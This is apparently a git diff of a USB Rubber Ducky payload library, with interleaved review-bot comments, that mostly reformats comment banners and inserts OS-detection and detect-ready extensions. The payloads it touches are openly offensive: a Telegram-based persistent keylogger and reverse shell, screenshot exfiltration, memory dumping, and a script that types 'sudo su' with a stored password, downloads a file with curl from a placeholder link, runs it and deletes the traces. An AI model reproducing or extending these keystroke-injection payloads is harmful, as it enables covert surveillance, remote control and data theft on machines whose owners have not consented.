@@ -16,7 +18,48 @@ REM - Nothing REM Note: REM - Payload tested on Windows 11 Eng +EXTENSION PASSIVE_WINDOWS_DETECT + REM VERSION 1.1 + REM AUTHOR: Korben + REM_BLOCK DOCUMENTATION + Windows fully passive OS Detection and passive Detect Ready + Includes its own passive detect ready. + Does not require additional extensions. + + USAGE: + Extension runs inline (here) + Place at beginning of payload (besides ATTACKMODE) to act as dynamic + boot delay + $_OS will be set to WINDOWS or NOT_WINDOWS + See end of payload for usage within payload + END_REM + + REM CONFIGURATION: + DEFINE #MAX_WAIT 150 + DEFINE #CHECK_INTERVAL 20 + DEFINE #WINDOWS_HOST_REQUEST_COUNT 2 + DEFINE #NOT_WINDOWS 7 + + $_OS = #NOT_WINDOWS + + VAR $MAX_TRIES = #MAX_WAIT + WHILE(($_RECEIVED_HOST_LOCK_LED_REPLY == FALSE) && ($MAX_TRIES > 0)) + DELAY #CHECK_INTERVAL + $MAX_TRIES = ($MAX_TRIES - 1) + END_WHILE + IF ($_HOST_CONFIGURATION_REQUEST_COUNT > #WINDOWS_HOST_REQUEST_COUNT) THEN + $_OS = WINDOWS + END_IF + + REM_BLOCK EXAMPLE USAGE AFTER EXTENSION + IF ($_OS == WINDOWS) THEN + STRING HELLO WINDOWS! + ELSE + STRING HELLO WORLD! + END_IF + END_REM +END_EXTENSION GUI r DELAY 2000 diff --git a/payloads/library/execution/Persistent_Keylogger-Telegram_Based/payload.txt b/payloads/library/execution/Persistent_Keylogger-Telegram_Based/payload.txt index 50149ba..8c6bccd 100644 --- a/payloads/library/execution/Persistent_Keylogger-Telegram_Based/payload.txt +++ b/payloads/library/execution/Persistent_Keylogger-Telegram_Based/payload.txt 
@@ -1,12 +1,14 @@ -REM ######################################################## -REM # # -REM # Title : Persistent Keylogger - Telegram Based # -REM # Author : Aleff # -REM # Version : 1.0 # -REM # Category : Execution # -REM # Target : Linux # -REM # # -REM ######################################################## +REM_BLOCK +######################################################## +# # +# Title : Persistent Keylogger - Telegram Based # +# Author : Aleff # +# Version : 1.0 # +# Category : Execution # +# Target : Linux # +# # +######################################################## +END_REM REM Requirements: REM - Internet Connection @@ -14,7 +16,33 @@ REM - Internet Connection REM Here you must put your own file link DEFINE #PYTHON-SCRIPT-LINK https://www.example.com/connection.py -DELAY 1000 +EXTENSION DETECT_READY + REM VERSION 1.1 + REM AUTHOR: Korben + + REM_BLOCK DOCUMENTATION + USAGE: + Extension runs inline (here) + Place at beginning of payload (besides ATTACKMODE) to act as dynamic + boot delay + + TARGETS: + Any system that reflects CAPSLOCK will detect minimum required delay + Any system that does not reflect CAPSLOCK will hit the max delay of 3000ms + END_REM + + REM CONFIGURATION: + DEFINE #RESPONSE_DELAY 25 + DEFINE #ITERATION_LIMIT 120 + + VAR $C = 0 + WHILE (($_CAPSLOCK_ON == FALSE) && ($C < #ITERATION_LIMIT)) + CAPSLOCK + DELAY #RESPONSE_DELAY + $C = ($C + 1) + END_WHILE + CAPSLOCK +END_EXTENSION CTRL-ALT t DELAY 2000 diff --git a/payloads/library/execution/Persistent_Reverse_Shell-Telegram_Based/payload.txt b/payloads/library/execution/Persistent_Reverse_Shell-Telegram_Based/payload.txt index 1ce3096..36ef494 100644 --- a/payloads/library/execution/Persistent_Reverse_Shell-Telegram_Based/payload.txt +++ b/payloads/library/execution/Persistent_Reverse_Shell-Telegram_Based/payload.txt 
@@ -1,12 +1,14 @@ -REM ############################################################ -REM # # -REM # Title : Persistent Reverse Shell - Telegram Based # -REM # Author : Aleff # -REM # Version : 1.0 # -REM # Category : Execution # -REM # Target : Linux # -REM # # -REM ############################################################ +REM_BLOCK +############################################################ +# # +# Title : Persistent Reverse Shell - Telegram Based # +# Author : Aleff # +# Version : 1.0 # +# Category : Execution # +# Target : Linux # +# # +############################################################ +END_REM REM Requirements: REM - Internet Connection @@ -14,7 +16,33 @@ REM - Internet Connection REM Here you must put your own file link DEFINE #PYTHON-SCRIPT-LINK https://www.example.com/connection.py -DELAY 1000 +EXTENSION DETECT_READY + REM VERSION 1.1 + REM AUTHOR: Korben + + REM_BLOCK DOCUMENTATION + USAGE: + Extension runs inline (here) + Place at beginning of payload (besides ATTACKMODE) to act as dynamic + boot delay + + TARGETS: + Any system that reflects CAPSLOCK will detect minimum required delay + Any system that does not reflect CAPSLOCK will hit the max delay of 3000ms + END_REM + + REM CONFIGURATION: + DEFINE #RESPONSE_DELAY 25 + DEFINE #ITERATION_LIMIT 120 + + VAR $C = 0 + WHILE (($_CAPSLOCK_ON == FALSE) && ($C < #ITERATION_LIMIT)) + CAPSLOCK + DELAY #RESPONSE_DELAY + $C = ($C + 1) + END_WHILE + CAPSLOCK +END_EXTENSION CTRL-ALT t DELAY 2000 diff --git a/payloads/library/execution/SendEmailThroughThunderbird/payload.txt b/payloads/library/execution/SendEmailThroughThunderbird/payload.txt index c2dd218..457de69 100644 --- a/payloads/library/execution/SendEmailThroughThunderbird/payload.txt +++ b/payloads/library/execution/SendEmailThroughThunderbird/payload.txt 
@@ -1,13 +1,14 @@ -REM ######################################################## -REM # | -REM # Title : Send Email Through Thunderbird | -REM # Author : Aleff | -REM # Version : 1.0 | -REM # Category : Execution | -REM # Target : Windows 10/11 - Linux(debian tested) | -REM # | -REM ######################################################## - +REM_BLOCK +######################################################## +# # +# Title : Send Email Through Thunderbird # +# Author : Aleff # +# Version : 1.0 # +# Category : Execution # +# Target : Windows 10/11 - Linux(debian tested) # +# # +######################################################## +END_REM REM Requirements: REM - Internet Connection diff --git a/payloads/library/execution/Send_Messages_In_Discord_Channel-Server/payload.txt b/payloads/library/execution/Send_Messages_In_Discord_Channel-Server/payload.txt index 0e82f52..831f1d0 100644 --- a/payloads/library/execution/Send_Messages_In_Discord_Channel-Server/payload.txt +++ b/payloads/library/execution/Send_Messages_In_Discord_Channel-Server/payload.txt 
@@ -1,22 +1,64 @@ -REM ############################################################ -REM # | -REM # Title : Send Messages In Discord Channel-Server | -REM # Author : Aleff | -REM # Version : 1.0 | -REM # Category : Execution | -REM # Target : Windows 10-11 | -REM # | -REM ############################################################ - +REM_BLOCK +############################################################ +# # +# Title : Send Messages In Discord Channel-Server # +# Author : Aleff # +# Version : 1.0 # +# Category : Execution # +# Target : Windows 10-11 # +# # +############################################################ +END_REM REM Requirements: REM - Internet connection REM - Discord Installed - REM If, for example, the server is Hak5 and the channel in which you want to send the message is called usb-rubber-ducky then you should write just usb-rubber-ducky DEFINE #CHAT_NAME example +EXTENSION PASSIVE_WINDOWS_DETECT + REM VERSION 1.1 + REM AUTHOR: Korben + + REM_BLOCK DOCUMENTATION + Windows fully passive OS Detection and passive Detect Ready + Includes its own passive detect ready. + Does not require additional extensions. + + USAGE: + Extension runs inline (here) + Place at beginning of payload (besides ATTACKMODE) to act as dynamic + boot delay + $_OS will be set to WINDOWS or NOT_WINDOWS + See end of payload for usage within payload + END_REM + + REM CONFIGURATION: + DEFINE #MAX_WAIT 150 + DEFINE #CHECK_INTERVAL 20 + DEFINE #WINDOWS_HOST_REQUEST_COUNT 2 + DEFINE #NOT_WINDOWS 7 + + $_OS = #NOT_WINDOWS + + VAR $MAX_TRIES = #MAX_WAIT + WHILE(($_RECEIVED_HOST_LOCK_LED_REPLY == FALSE) && ($MAX_TRIES > 0)) + DELAY #CHECK_INTERVAL + $MAX_TRIES = ($MAX_TRIES - 1) + END_WHILE + IF ($_HOST_CONFIGURATION_REQUEST_COUNT > #WINDOWS_HOST_REQUEST_COUNT) THEN + $_OS = WINDOWS + END_IF + + REM_BLOCK EXAMPLE USAGE AFTER EXTENSION + IF ($_OS == WINDOWS) THEN + STRING HELLO WINDOWS! + ELSE + STRING HELLO WORLD! + END_IF + END_REM +END_EXTENSION REM Open Discord app GUI 
diff --git a/payloads/library/execution/SetArbitraryVPN_Linux/payload.txt b/payloads/library/execution/SetArbitraryVPN_Linux/payload.txt index 1cd8718..f29cf08 100644 --- a/payloads/library/execution/SetArbitraryVPN_Linux/payload.txt +++ b/payloads/library/execution/SetArbitraryVPN_Linux/payload.txt @@ -1,13 +1,14 @@ - -REM #################################### -REM # | -REM # Title : Set Arbitrary VPN | -REM # Author : Aleff | -REM # Version : 1.0 | -REM # Category : Execution | -REM # Target : Linux | -REM # | -REM #################################### +REM_BLOCK +#################################### +# # +# Title : Set Arbitrary VPN # +# Author : Aleff # +# Version : 1.0 # +# Category : Execution # +# Target : Linux # +# # +#################################### +END_REM REM Requirements: REM - Permissions 
@@ -15,44 +16,57 @@ REM - Internet Connection REM - 'openvpn' installed REM REQUIRED: You need to know the sudo password and replace 'example' with this -DEFINE SUDO_PASS example +DEFINE #SUDO_PASS example REM REQUIRED: Set your VPN file configuration replacing example.com with your own link -DEFINE VPN_FILE_LINK example.com +DEFINE #VPN_FILE_LINK example.com + +EXTENSION DETECT_READY + REM VERSION 1.1 + REM AUTHOR: Korben + + REM_BLOCK DOCUMENTATION + USAGE: + Extension runs inline (here) + Place at beginning of payload (besides ATTACKMODE) to act as dynamic + boot delay + + TARGETS: + Any system that reflects CAPSLOCK will detect minimum required delay + Any system that does not reflect CAPSLOCK will hit the max delay of 3000ms + END_REM + + REM CONFIGURATION: + DEFINE #RESPONSE_DELAY 25 + DEFINE #ITERATION_LIMIT 120 + + VAR $C = 0 + WHILE (($_CAPSLOCK_ON == FALSE) && ($C < #ITERATION_LIMIT)) + CAPSLOCK + DELAY #RESPONSE_DELAY + $C = ($C + 1) + END_WHILE + CAPSLOCK +END_EXTENSION -DELAY 1000 CTRL-ALT t DELAY 2000 - REM #### PERMISSIONS SECTION #### - - -STRING sudo su -ENTER +STRINGLN sudo su DELAY 1000 -STRING SUDO_PASS -ENTER +STRINGLN #SUDO_PASS DELAY 1000 - REM #### VPN SECTION #### - - -STRING curl -STRING VPN_FILE_LINK -STRING > vpn_configuration.ovpn -ENTER +STRINGLN curl #VPN_FILE_LINK > vpn_configuration.ovpn REM It depends by the internet connection DELAY 2000 -STRING openvpn vpn_configuration.ovpn +STRINGLN openvpn vpn_configuration.ovpn REM It depends by the computer power DELAY 2000 - REM #### REMOVE TRACES #### - - STRING rm vpn_configuration.ovpn ENTER DELAY 500 diff --git a/payloads/library/execution/Set_An_Arbitrary_And_Persistent_Tor_Circuit/payload.txt b/payloads/library/execution/Set_An_Arbitrary_And_Persistent_Tor_Circuit/payload.txt index 1c690de..3ac3507 100644 --- a/payloads/library/execution/Set_An_Arbitrary_And_Persistent_Tor_Circuit/payload.txt +++ b/payloads/library/execution/Set_An_Arbitrary_And_Persistent_Tor_Circuit/payload.txt 
@@ -1,12 +1,12 @@ REM_BLOCK ################################################################ -# | -# Title : Set An Arbitrary And Persistent Tor Circuit | -# Author : Aleff | -# Version : 1.0 | -# Category : Execution | -# Target : Windows 10/11; Linux; | -# | +# # +# Title : Set An Arbitrary And Persistent Tor Circuit # +# Author : Aleff # +# Version : 1.0 # +# Category : Execution # +# Target : Windows 10/11; Linux; # +# # ################################################################ Requirements: diff --git a/payloads/library/execution/Set_An_Arbitrary_DNS-IPv4_version/payload.txt b/payloads/library/execution/Set_An_Arbitrary_DNS-IPv4_version/payload.txt index 2c29325..db55616 100644 --- a/payloads/library/execution/Set_An_Arbitrary_DNS-IPv4_version/payload.txt +++ b/payloads/library/execution/Set_An_Arbitrary_DNS-IPv4_version/payload.txt 
@@ -1,24 +1,65 @@ -REM ######################################################## -REM # | -REM # Title : Set An Arbitrary DNS (IPv4 version) | -REM # Author : Aleff | -REM # Version : 1.0 | -REM # Category : Execution | -REM # Target : Windows 11 | -REM # | -REM ######################################################## - +REM_BLOCK +######################################################## +# # +# Title : Set An Arbitrary DNS (IPv4 version) # +# Author : Aleff # +# Version : 1.0 # +# Category : Execution # +# Target : Windows 11 # +# # +######################################################## +END_REM REM Requirements: REM - Nothing - REM DNS IPv4 like Cloudflare DNS 1.1.1.1 DEFINE DNS example +EXTENSION PASSIVE_WINDOWS_DETECT + REM VERSION 1.1 + REM AUTHOR: Korben + + REM_BLOCK DOCUMENTATION + Windows fully passive OS Detection and passive Detect Ready + Includes its own passive detect ready. + Does not require additional extensions. + + USAGE: + Extension runs inline (here) + Place at beginning of payload (besides ATTACKMODE) to act as dynamic + boot delay + $_OS will be set to WINDOWS or NOT_WINDOWS + See end of payload for usage within payload + END_REM + + REM CONFIGURATION: + DEFINE #MAX_WAIT 150 + DEFINE #CHECK_INTERVAL 20 + DEFINE #WINDOWS_HOST_REQUEST_COUNT 2 + DEFINE #NOT_WINDOWS 7 + + $_OS = #NOT_WINDOWS + + VAR $MAX_TRIES = #MAX_WAIT + WHILE(($_RECEIVED_HOST_LOCK_LED_REPLY == FALSE) && ($MAX_TRIES > 0)) + DELAY #CHECK_INTERVAL + $MAX_TRIES = ($MAX_TRIES - 1) + END_WHILE + IF ($_HOST_CONFIGURATION_REQUEST_COUNT > #WINDOWS_HOST_REQUEST_COUNT) THEN + $_OS = WINDOWS + END_IF + + REM_BLOCK EXAMPLE USAGE AFTER EXTENSION + IF ($_OS == WINDOWS) THEN + STRING HELLO WINDOWS! + ELSE + STRING HELLO WORLD! + END_IF + END_REM +END_EXTENSION REM Open Settings -DELAY 1000 GUI DELAY 1000 STRING settings 
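Review bot: `DEFINE DNS example` keeps its un-prefixed name, while this same commit renames other constants to the `#` form (`#SUDO_PASS`, `#VPN_FILE_LINK`, `#TOKEN`). A bare name as short as `DNS` is presumably substituted wherever that text occurs in a typed string, so the prefix is more than cosmetic here. I would change it to `DEFINE #DNS example` and update its uses, which are outside this hunk. The same applies to `DEFINE PROCESS_NAME example` / `STRINGLN PROCESS_NAME` in Stop_A_Single_Process_In_Windows and to `DEFINE SCRIPT-PY-LINK example.com` in Exfiltrate Computer Screenshots.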
diff --git a/payloads/library/execution/Set_Tor_Bridge_In_Windows/payload.txt b/payloads/library/execution/Set_Tor_Bridge_In_Windows/payload.txt index fca7921..5718b92 100644 --- a/payloads/library/execution/Set_Tor_Bridge_In_Windows/payload.txt +++ b/payloads/library/execution/Set_Tor_Bridge_In_Windows/payload.txt @@ -1,12 +1,14 @@ -REM ################################### -REM # | -REM # Title : Set Tor Bridge | -REM # Author : Aleff | -REM # Version : 1.0 | -REM # Category : Execution | -REM # Target : Windows 10/11 | -REM # | -REM ################################### +REM_BLOCK +################################### +# # +# Title : Set Tor Bridge # +# Author : Aleff # +# Version : 1.0 # +# Category : Execution # +# Target : Windows 10/11 # +# # +################################### +END_REM REM Requirements: REM - Tor installed diff --git a/payloads/library/execution/Starting_a_PowerShell_with_administrator_permissions_in_Windows/payload.txt b/payloads/library/execution/Starting_a_PowerShell_with_administrator_permissions_in_Windows/payload.txt index 9935c89..bba8865 100644 --- a/payloads/library/execution/Starting_a_PowerShell_with_administrator_permissions_in_Windows/payload.txt +++ b/payloads/library/execution/Starting_a_PowerShell_with_administrator_permissions_in_Windows/payload.txt 
@@ -1,17 +1,61 @@ -REM #################################################################################### -REM # | -REM # Title : Starting a PowerShell with administrator permissions in Windows | -REM # Author : Aleff | -REM # Version : 1.0 | -REM # Category : Execution | -REM # Target : Windows 10-11 | -REM # | -REM #################################################################################### +REM_BLOCK +#################################################################################### +# # +# Title : Starting a PowerShell with administrator permissions in Windows # +# Author : Aleff # +# Version : 1.0 # +# Category : Execution # +# Target : Windows 10-11 # +# # +#################################################################################### +END_REM REM Requirements: REM - Nothing -DELAY 1000 +EXTENSION PASSIVE_WINDOWS_DETECT + REM VERSION 1.1 + REM AUTHOR: Korben + + REM_BLOCK DOCUMENTATION + Windows fully passive OS Detection and passive Detect Ready + Includes its own passive detect ready. + Does not require additional extensions. + + USAGE: + Extension runs inline (here) + Place at beginning of payload (besides ATTACKMODE) to act as dynamic + boot delay + $_OS will be set to WINDOWS or NOT_WINDOWS + See end of payload for usage within payload + END_REM + + REM CONFIGURATION: + DEFINE #MAX_WAIT 150 + DEFINE #CHECK_INTERVAL 20 + DEFINE #WINDOWS_HOST_REQUEST_COUNT 2 + DEFINE #NOT_WINDOWS 7 + + $_OS = #NOT_WINDOWS + + VAR $MAX_TRIES = #MAX_WAIT + WHILE(($_RECEIVED_HOST_LOCK_LED_REPLY == FALSE) && ($MAX_TRIES > 0)) + DELAY #CHECK_INTERVAL + $MAX_TRIES = ($MAX_TRIES - 1) + END_WHILE + IF ($_HOST_CONFIGURATION_REQUEST_COUNT > #WINDOWS_HOST_REQUEST_COUNT) THEN + $_OS = WINDOWS + END_IF + + REM_BLOCK EXAMPLE USAGE AFTER EXTENSION + IF ($_OS == WINDOWS) THEN + STRING HELLO WINDOWS! + ELSE + STRING HELLO WORLD! + END_IF + END_REM +END_EXTENSION + GUI x DELAY 500 STRING a 
diff --git a/payloads/library/execution/Stop_A_Single_Process_In_Windows/payload.txt b/payloads/library/execution/Stop_A_Single_Process_In_Windows/payload.txt index dbdc29d..178f3b1 100644 --- a/payloads/library/execution/Stop_A_Single_Process_In_Windows/payload.txt +++ b/payloads/library/execution/Stop_A_Single_Process_In_Windows/payload.txt 
@@ -1,28 +1,68 @@ - -REM ##################################################### -REM # | -REM # Title : Stop A Single Process In Windows | -REM # Author : Aleff | -REM # Version : 1.0 | -REM # Category : Execution | -REM # Target : Windows 10/11 | -REM # | -REM ##################################################### - +REM_BLOCK +##################################################### +# # +# Title : Stop A Single Process In Windows # +# Author : Aleff # +# Version : 1.0 # +# Category : Execution # +# Target : Windows 10/11 # +# # +##################################################### +END_REM REM Requirements: REM - Nothing - REM Write the name of the process that you want to stop DEFINE PROCESS_NAME example +EXTENSION PASSIVE_WINDOWS_DETECT + REM VERSION 1.1 + REM AUTHOR: Korben + + REM_BLOCK DOCUMENTATION + Windows fully passive OS Detection and passive Detect Ready + Includes its own passive detect ready. + Does not require additional extensions. + + USAGE: + Extension runs inline (here) + Place at beginning of payload (besides ATTACKMODE) to act as dynamic + boot delay + $_OS will be set to WINDOWS or NOT_WINDOWS + See end of payload for usage within payload + END_REM + + REM CONFIGURATION: + DEFINE #MAX_WAIT 150 + DEFINE #CHECK_INTERVAL 20 + DEFINE #WINDOWS_HOST_REQUEST_COUNT 2 + DEFINE #NOT_WINDOWS 7 + + $_OS = #NOT_WINDOWS + + VAR $MAX_TRIES = #MAX_WAIT + WHILE(($_RECEIVED_HOST_LOCK_LED_REPLY == FALSE) && ($MAX_TRIES > 0)) + DELAY #CHECK_INTERVAL + $MAX_TRIES = ($MAX_TRIES - 1) + END_WHILE + IF ($_HOST_CONFIGURATION_REQUEST_COUNT > #WINDOWS_HOST_REQUEST_COUNT) THEN + $_OS = WINDOWS + END_IF + + REM_BLOCK EXAMPLE USAGE AFTER EXTENSION + IF ($_OS == WINDOWS) THEN + STRING HELLO WINDOWS! + ELSE + STRING HELLO WORLD! + END_IF + END_REM +END_EXTENSION REM Open Task Manager GUI DELAY 1000 -STRING Task Manager -ENTER +STRINGLN Task Manager DELAY 1000 REM Goto search bar 
@@ -36,9 +76,7 @@ TAB DELAY 500 REM Write the process name -STRING PROCESS_NAME -DELAY 500 -ENTER +STRINGLN PROCESS_NAME DELAY 500 TAB DELAY 500 diff --git a/payloads/library/execution/Telegram_Persistent_Connection_Linux/payload.txt b/payloads/library/execution/Telegram_Persistent_Connection_Linux/payload.txt index 0d4958d..b3738e8 100644 --- a/payloads/library/execution/Telegram_Persistent_Connection_Linux/payload.txt +++ b/payloads/library/execution/Telegram_Persistent_Connection_Linux/payload.txt @@ -1,12 +1,14 @@ -REM ####################################################### -REM # | -REM # Title : Telegram Persistent Connection Linux | -REM # Author : Aleff | -REM # Version : 1.0 | -REM # Category : Execution | -REM # Target : Linux | -REM # | -REM ####################################################### +REM_BLOCK +####################################################### +# # +# Title : Telegram Persistent Connection Linux # +# Author : Aleff # +# Version : 1.0 # +# Category : Execution # +# Target : Linux # +# # +####################################################### +END_REM REM Requirements: REM - Internet Connection @@ -14,7 +16,34 @@ REM - Internet Connection REM Here you must put your own file link DEFINE #PYTHON-SCRIPT-LINK https://www.example.com/connection.py -DELAY 1000 +EXTENSION DETECT_READY + REM VERSION 1.1 + REM AUTHOR: Korben + + REM_BLOCK DOCUMENTATION + USAGE: + Extension runs inline (here) + Place at beginning of payload (besides ATTACKMODE) to act as dynamic + boot delay + + TARGETS: + Any system that reflects CAPSLOCK will detect minimum required delay + Any system that does not reflect CAPSLOCK will hit the max delay of 3000ms + END_REM + + REM CONFIGURATION: + DEFINE #RESPONSE_DELAY 25 + DEFINE #ITERATION_LIMIT 120 + + VAR $C = 0 + WHILE (($_CAPSLOCK_ON == FALSE) && ($C < #ITERATION_LIMIT)) + CAPSLOCK + DELAY #RESPONSE_DELAY + $C = ($C + 1) + END_WHILE + CAPSLOCK +END_EXTENSION + CTRL-ALT t DELAY 2000 
diff --git a/payloads/library/execution/UninstallSignal/payload.txt b/payloads/library/execution/UninstallSignal/payload.txt index 9006fba..9beced9 100644 --- a/payloads/library/execution/UninstallSignal/payload.txt +++ b/payloads/library/execution/UninstallSignal/payload.txt @@ -1,12 +1,14 @@ -REM ##################################### -REM # | -REM # Title : Uninstall Signal | -REM # Author : Aleff | -REM # Version : 1.0 | -REM # Category : Execution | -REM # Target : Windows 10-11 | -REM # | -REM ##################################### +REM_BLOCK +##################################### +# # +# Title : Uninstall Signal # +# Author : Aleff # +# Version : 1.0 # +# Category : Execution # +# Target : Windows 10-11 # +# # +##################################### +END_REM REM Plug-And-Play <3 
@@ -14,11 +16,52 @@ REM Requirements: REM - Signal App installed REM - ExecutionPolicy Bypass -DELAY 2000 +EXTENSION PASSIVE_WINDOWS_DETECT + REM VERSION 1.1 + REM AUTHOR: Korben + + REM_BLOCK DOCUMENTATION + Windows fully passive OS Detection and passive Detect Ready + Includes its own passive detect ready. + Does not require additional extensions. + + USAGE: + Extension runs inline (here) + Place at beginning of payload (besides ATTACKMODE) to act as dynamic + boot delay + $_OS will be set to WINDOWS or NOT_WINDOWS + See end of payload for usage within payload + END_REM + + REM CONFIGURATION: + DEFINE #MAX_WAIT 150 + DEFINE #CHECK_INTERVAL 20 + DEFINE #WINDOWS_HOST_REQUEST_COUNT 2 + DEFINE #NOT_WINDOWS 7 + + $_OS = #NOT_WINDOWS + + VAR $MAX_TRIES = #MAX_WAIT + WHILE(($_RECEIVED_HOST_LOCK_LED_REPLY == FALSE) && ($MAX_TRIES > 0)) + DELAY #CHECK_INTERVAL + $MAX_TRIES = ($MAX_TRIES - 1) + END_WHILE + IF ($_HOST_CONFIGURATION_REQUEST_COUNT > #WINDOWS_HOST_REQUEST_COUNT) THEN + $_OS = WINDOWS + END_IF + + REM_BLOCK EXAMPLE USAGE AFTER EXTENSION + IF ($_OS == WINDOWS) THEN + STRING HELLO WINDOWS! + ELSE + STRING HELLO WORLD! + END_IF + END_REM +END_EXTENSION + GUI r DELAY 1000 -STRING powershell -ENTER +STRINGLN powershell DELAY 2000 STRINGLN Stop-Process -Name "Signal" diff --git a/payloads/library/execution/Uninstall_A_Specific_App_On_Windows_Through_Control_Panel/README.md b/payloads/library/execution/Uninstall_A_Specific_App_On_Windows_Through_Control_Panel/README.md index 826bc0c..60bb2ac 100644 --- a/payloads/library/execution/Uninstall_A_Specific_App_On_Windows_Through_Control_Panel/README.md +++ b/payloads/library/execution/Uninstall_A_Specific_App_On_Windows_Through_Control_Panel/README.md @@ -36,17 +36,11 @@ In addition to legal implications, **unauthorized removal of an application can
Github - - - - -
Instagram - -
Discord +
Linkedin diff --git a/payloads/library/execution/Uninstall_A_Specific_App_On_Windows_Through_Control_Panel/payload.txt b/payloads/library/execution/Uninstall_A_Specific_App_On_Windows_Through_Control_Panel/payload.txt index 67f6dbd..07366cf 100644 --- a/payloads/library/execution/Uninstall_A_Specific_App_On_Windows_Through_Control_Panel/payload.txt +++ b/payloads/library/execution/Uninstall_A_Specific_App_On_Windows_Through_Control_Panel/payload.txt @@ -1,12 +1,14 @@ -REM ############################################################################## -REM # | -REM # Title : Uninstall A Specific App On Windows Through Control Panel | -REM # Author : Aleff | -REM # Version : 1.0 | -REM # Category : Execution | -REM # Target : Windows 10/11 | -REM # | -REM ############################################################################## +REM_BLOCK +############################################################################## +# # +# Title : Uninstall A Specific App On Windows Through Control Panel # +# Author : Aleff # +# Version : 1.0 # +# Category : Execution # +# Target : Windows 10/11 # +# # +############################################################################## +END_REM REM Requirements: REM - The application you want to uninstall must be installed on the target (?obvious right? ^^) 
@@ -17,15 +19,55 @@ REM - Payload tested on Windows 11 Eng REM Set the exact name of the application as it appears within the control panel. Do not assume that just because an application is known by a certain name then it will have exactly that name, e.g. `Firefox` shows up again as `Mozilla Firefox (x64 en)` DEFINE #APP_NAME example +EXTENSION PASSIVE_WINDOWS_DETECT + REM VERSION 1.1 + REM AUTHOR: Korben + + REM_BLOCK DOCUMENTATION + Windows fully passive OS Detection and passive Detect Ready + Includes its own passive detect ready. + Does not require additional extensions. + + USAGE: + Extension runs inline (here) + Place at beginning of payload (besides ATTACKMODE) to act as dynamic + boot delay + $_OS will be set to WINDOWS or NOT_WINDOWS + See end of payload for usage within payload + END_REM + + REM CONFIGURATION: + DEFINE #MAX_WAIT 150 + DEFINE #CHECK_INTERVAL 20 + DEFINE #WINDOWS_HOST_REQUEST_COUNT 2 + DEFINE #NOT_WINDOWS 7 + + $_OS = #NOT_WINDOWS + + VAR $MAX_TRIES = #MAX_WAIT + WHILE(($_RECEIVED_HOST_LOCK_LED_REPLY == FALSE) && ($MAX_TRIES > 0)) + DELAY #CHECK_INTERVAL + $MAX_TRIES = ($MAX_TRIES - 1) + END_WHILE + IF ($_HOST_CONFIGURATION_REQUEST_COUNT > #WINDOWS_HOST_REQUEST_COUNT) THEN + $_OS = WINDOWS + END_IF + + REM_BLOCK EXAMPLE USAGE AFTER EXTENSION + IF ($_OS == WINDOWS) THEN + STRING HELLO WINDOWS! + ELSE + STRING HELLO WORLD! + END_IF + END_REM +END_EXTENSION REM Open Windows research -DELAY 2000 GUI DELAY 1000 REM Search and opern explorer app -STRING explorer -ENTER +STRINGLN explorer DELAY 1000 REM Goto search bar and open "Uninstall or change a program" page diff --git a/payloads/library/exfiltration/Dump_Windows_Memory_Through_ProcDump/payload.txt b/payloads/library/exfiltration/Dump_Windows_Memory_Through_ProcDump/payload.txt index 63282c8..d7c5910 100644 --- a/payloads/library/exfiltration/Dump_Windows_Memory_Through_ProcDump/payload.txt +++ b/payloads/library/exfiltration/Dump_Windows_Memory_Through_ProcDump/payload.txt 
@@ -1,18 +1,18 @@ -REM ######################################################## -REM # # -REM # Title : Dump Windows Memory Through ProcDump # -REM # Author : Aleff # -REM # Version : 1.0 # -REM # Category : Exfiltration # -REM # Target : Windows # -REM # # -REM ######################################################## - +REM_BLOCK +######################################################## +# # +# Title : Dump Windows Memory Through ProcDump # +# Author : Aleff # +# Version : 1.0 # +# Category : Exfiltration # +# Target : Windows # +# # +######################################################## +END_REM REM Requirements: REM - Authorization to execute powershell commands - REM You must change it to 'procdump' if you want to use procdump.exe instead of procdump64a.exe DEFINE #WHAT_EXE_DO_YOU_WANT_TO_USE procdump64a diff --git a/payloads/library/exfiltration/Exfiltrate Computer Screenshots/payload.txt b/payloads/library/exfiltration/Exfiltrate Computer Screenshots/payload.txt index 05ee6f0..6f6e6f6 100644 --- a/payloads/library/exfiltration/Exfiltrate Computer Screenshots/payload.txt +++ b/payloads/library/exfiltration/Exfiltrate Computer Screenshots/payload.txt @@ -1,13 +1,12 @@ -REM ################################################### -REM # | -REM # Title : Exfiltrate Computer Screenshots | -REM # Author : Aleff | -REM # Version : 1.0 | -REM # Category : Exfiltrate | -REM # Target : Windows 10-11 | -REM # | -REM ################################################### - +################################################### +# # +# Title : Exfiltrate Computer Screenshots # +# Author : Aleff # +# Version : 1.0 # +# Category : Exfiltrate # +# Target : Windows 10-11 # +# # +################################################### REM Requirements: REM - Internet Connection 
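Review bot: In `Exfiltrate Computer Screenshots/payload.txt` the rewritten banner is added as bare `#` lines, with no `REM_BLOCK` line before it and no `END_REM` after it. Every other banner converted in this commit has both. The removed lines were individual `REM` comments, and the hunk counts (13 old lines, 12 new) confirm the wrapper lines were not added, so the banner is presumably no longer treated as a comment. Add `REM_BLOCK` above the first `####` line and `END_REM` after the last one, as in the sibling files.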
@@ -15,12 +14,53 @@ REM - Discord Webhook (or whatever you want for the exfiltration) REM - ExecutionPolicy Bypass REM - Python - REM REQUIRED - Set your Python script link DEFINE SCRIPT-PY-LINK example.com -DELAY 1000 +EXTENSION PASSIVE_WINDOWS_DETECT + REM VERSION 1.1 + REM AUTHOR: Korben + + REM_BLOCK DOCUMENTATION + Windows fully passive OS Detection and passive Detect Ready + Includes its own passive detect ready. + Does not require additional extensions. + + USAGE: + Extension runs inline (here) + Place at beginning of payload (besides ATTACKMODE) to act as dynamic + boot delay + $_OS will be set to WINDOWS or NOT_WINDOWS + See end of payload for usage within payload + END_REM + + REM CONFIGURATION: + DEFINE #MAX_WAIT 150 + DEFINE #CHECK_INTERVAL 20 + DEFINE #WINDOWS_HOST_REQUEST_COUNT 2 + DEFINE #NOT_WINDOWS 7 + + $_OS = #NOT_WINDOWS + + VAR $MAX_TRIES = #MAX_WAIT + WHILE(($_RECEIVED_HOST_LOCK_LED_REPLY == FALSE) && ($MAX_TRIES > 0)) + DELAY #CHECK_INTERVAL + $MAX_TRIES = ($MAX_TRIES - 1) + END_WHILE + IF ($_HOST_CONFIGURATION_REQUEST_COUNT > #WINDOWS_HOST_REQUEST_COUNT) THEN + $_OS = WINDOWS + END_IF + + REM_BLOCK EXAMPLE USAGE AFTER EXTENSION + IF ($_OS == WINDOWS) THEN + STRING HELLO WINDOWS! + ELSE + STRING HELLO WORLD! + END_IF + END_REM +END_EXTENSION + GUI r DELAY 1000 STRING powershell diff --git a/payloads/library/exfiltration/ExfiltrateLinuxContentWithDropbox/README.md 